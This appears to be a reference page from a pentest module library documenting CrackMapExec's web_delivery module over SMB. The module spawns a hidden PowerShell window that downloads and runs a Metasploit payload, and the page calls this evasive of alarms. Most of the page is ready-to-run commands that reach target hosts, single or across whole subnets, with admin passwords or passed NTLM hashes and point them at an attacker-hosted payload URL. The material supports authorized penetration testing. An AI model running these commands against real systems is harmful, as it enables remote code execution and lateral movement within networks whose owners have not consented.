CrackMapExec Web_delivery (smb)

This page contains detailed information about how to use the web_delivery CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description

---

This module kicks off a Metasploit payload using the exploit/multi/script/web_delivery module. In essense, it spawns a new, hidden PowerShell window that downloads and executes a Metasploit payload from a specified URL.

The web_delivery module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols

---

• mssql
• smb

Module Source Code

---

• https://github.com/byt3bl33d3r/CrackMapExec/tree/master/cme/modules/web_delivery.py

Authors

---

• @byt3bl33d3r

Module Options

---

As you can see below, the web_delivery module has one option:

# cme smb -M web_delivery --options
[*] web_delivery module options:

        URL  URL for the download cradle

The URL option is required! Make sure you set it when using this module.

Module Usage

---

This is how to use the web_delivery module while using the smb protocol:

Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M web_delivery -o URL=<url>

Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK

Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK

The web_delivery module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M web_delivery -o URL=http://10.0.6.11:8080/DJa4Onm3hMd2tK

References

---

• https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
• https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/script/web_delivery
• http://10.0.6.11:8080/DJa4Onm3hMd2tK

Version

---

This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.